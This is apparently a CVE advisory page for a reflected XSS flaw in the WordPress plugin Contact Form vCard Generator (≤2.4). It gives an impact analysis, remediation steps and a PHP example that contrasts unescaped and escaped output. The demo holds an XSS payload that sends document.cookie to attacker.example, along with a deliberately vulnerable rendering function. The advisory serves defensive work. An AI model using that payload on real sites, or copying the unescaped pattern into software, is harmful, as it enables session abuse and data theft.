Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ashish Ajani Contact Form vCard Generator (contact-form-vcard-generator) allows Reflected XSS. This issue affects Contact Form vCard Generator: from n/a through <= 2.4.
Published: 2025-04-17
Score: 7.1 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The vulnerability is an Improper Neutralization of Input During Web Page Generation flaw (CWE-79) that allows a reflected cross-site scripting (XSS) attack. Input that an attacker places in a request is echoed back into the plugin's response without adequate escaping, so a victim who opens a crafted link runs attacker-chosen JavaScript in the origin of the affected WordPress site. That script acts with whatever privileges the victim holds on the site: against an administrator it can drive the dashboard (change settings, create users, install plugins), and against any visitor it can deface the page or deliver phishing content. WordPress sets its authentication cookies HttpOnly, so stealing the session cookie itself is not the usual goal; abusing the victim's live session is.

Affected Systems

The flaw affects the WordPress plugin Contact Form vCard Generator (slug contact-form-vcard-generator) by Ashish Ajani, in all releases up to and including version 2.4; the record gives no lower bound ("n/a"). Any WordPress site with a vulnerable version of this plugin installed and active is exposed.

Risk and Exploitability

The vulnerability carries a CVSS 3.1 base score of 7.1 (High; vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L): the attacker needs no privileges and reaches the plugin over the network, but a user must interact, typically by opening a crafted URL whose parameters the plugin reflects. The changed scope records that the payload executes in the visitor's browser rather than in the plugin itself. EPSS is below 1%, the SSVC assessment records no known exploitation and rates the attack as not automatable, and the issue is not in CISA's KEV catalog, so the present likelihood of exploitation is low. Confidentiality, integrity and availability are each rated low impact, but because the payload inherits the victim's privileges on the site, the practical impact against a logged-in administrator is considerably higher, and timely remediation is warranted.

Generated by OpenCVE AI on April 30, 2026 at 22:07 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Check the plugin's release notes for a version newer than 2.4 that addresses this issue and upgrade to it; this record lists no fixed version yet.
  • Until a fixed release is available, deactivate and remove the Contact Form vCard Generator plugin.
  • As defense in depth, deploy a Content Security Policy that disallows inline scripts (a nonce- or hash-based script-src): a script reflected from the URL cannot carry a valid nonce and is refused by the browser. WordPress core, themes and other plugins routinely emit inline scripts, so trial the policy with Content-Security-Policy-Report-Only before enforcing it.
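The two patterns the analysis above describes, the unescaped reflection that produces this class of bug and the escaped rendering plus nonce-based CSP that the recommended actions call for, as an added PHP example. It is not the plugin's code and does not reproduce the actual affected parameter: the request parameter name `vcard_name`, the two handler functions, the `VCARD_CSP_NONCE` constant and the CLI stand-ins for the WordPress escaping helpers are all assumptions made for illustration.

```php
<?php
// Added illustration for CVE-2025-39521 (CWE-79, reflected XSS in a WordPress plugin).
// NOT the plugin's code: the request parameter name `vcard_name`, the two handler
// functions and the nonce constant are hypothetical. Outside WordPress the escaping
// helpers are replaced by stand-ins so the file runs from the PHP CLI (php example.php).

if (!function_exists('esc_html')) {
    function esc_html($text) { return htmlspecialchars((string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8'); }
}
if (!function_exists('esc_attr')) {
    function esc_attr($text) { return htmlspecialchars((string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8'); }
}
if (!function_exists('wp_unslash')) {
    function wp_unslash($value) { return is_string($value) ? stripslashes($value) : $value; }
}
if (!function_exists('sanitize_text_field')) {
    // Stand-in: the WordPress version also drops line breaks, control octets and extra spaces.
    function sanitize_text_field($str) { return trim(strip_tags((string) $str)); }
}

// VULNERABLE pattern: request input is concatenated into the page unescaped.
function vcard_form_vulnerable(array $request): string
{
    $name = $request['vcard_name'] ?? '';
    return '<form method="get">'
        . '<input type="text" name="vcard_name" value="' . $name . '">'
        . '<p>Generating vCard for ' . $name . '</p>'
        . '</form>';
}

// HARDENED pattern: unslash and sanitize on input, then escape for each output context
// (esc_attr inside the attribute value, esc_html in element content).
function vcard_form_hardened(array $request): string
{
    $name = sanitize_text_field(wp_unslash($request['vcard_name'] ?? ''));
    return '<form method="get">'
        . '<input type="text" name="vcard_name" value="' . esc_attr($name) . '">'
        . '<p>Generating vCard for ' . esc_html($name) . '</p>'
        . '</form>';
}

// Defense in depth: a per-request nonce policy. Only <script> tags carrying the nonce run,
// so a script reflected from the URL (which cannot know the nonce) is refused by the browser.
function csp_header_value(string $nonce): string
{
    return "default-src 'self'; script-src 'self' 'nonce-$nonce'; object-src 'none'; base-uri 'self'";
}

if (function_exists('add_action')) {
    // Inside WordPress: emit the header before any output (hypothetical wiring).
    add_action('send_headers', function () {
        define('VCARD_CSP_NONCE', bin2hex(random_bytes(16)));
        header('Content-Security-Policy: ' . csp_header_value(VCARD_CSP_NONCE));
    });
} else {
    // CLI demonstration with a constructed payload that closes the value attribute
    // and injects a script element.
    $payload = '"><script>document.location="https://attacker.example/?c="+document.cookie</script>';
    $request = ['vcard_name' => $payload];

    echo "vulnerable output:\n", vcard_form_vulnerable($request), "\n\n";
    echo "hardened output:\n", vcard_form_hardened($request), "\n\n";
    echo "CSP header:\n", csp_header_value(bin2hex(random_bytes(16))), "\n";

    // Check a tester would script: the raw tag survives only in the vulnerable rendering.
    if (strpos(vcard_form_vulnerable($request), '<script>') === false
        || strpos(vcard_form_hardened($request), '<script>') !== false) {
        fwrite(STDERR, "escaping check failed\n");
        exit(1);
    }
}
```

Output escaping is the fix; the CSP is a hedge that limits damage while a fixed release is awaited. Because the nonce policy also blocks every legitimate inline script that does not carry the nonce, roll it out in Content-Security-Policy-Report-Only mode first and add the nonce to the site's own inline scripts before switching to enforcement.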


Advisories
Source: EUVD
ID: EUVD-2025-11737
Title: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ashish Ajani Contact Form vCard Generator allows Reflected XSS. This issue affects Contact Form vCard Generator: from n/a through 2.4.
History

Thu, 23 Apr 2026 15:00:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}


Wed, 01 Apr 2026 23:45:00 +0000

Type Values Removed Values Added
Description
  Values Removed: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ashish Ajani Contact Form vCard Generator allows Reflected XSS. This issue affects Contact Form vCard Generator: from n/a through 2.4.
  Values Added: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ashish Ajani Contact Form vCard Generator contact-form-vcard-generator allows Reflected XSS.This issue affects Contact Form vCard Generator: from n/a through <= 2.4.
References
Metrics cvssV3_1

{'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}


Thu, 17 Apr 2025 19:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Thu, 17 Apr 2025 16:00:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ashish Ajani Contact Form vCard Generator allows Reflected XSS. This issue affects Contact Form vCard Generator: from n/a through 2.4.
Title WordPress Contact Form vCard Generator plugin <= 2.4 - Reflected Cross Site Scripting (XSS) vulnerability
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}



MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:12:33.956Z

Reserved: 2025-04-16T06:24:32.684Z

Link: CVE-2025-39521

Vulnrichment

Updated: 2025-04-17T18:09:03.698Z

NVD

Status : Deferred

Published: 2025-04-17T16:15:56.370

Modified: 2026-04-23T15:29:43.223

Link: CVE-2025-39521

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-30T22:15:16Z

Weaknesses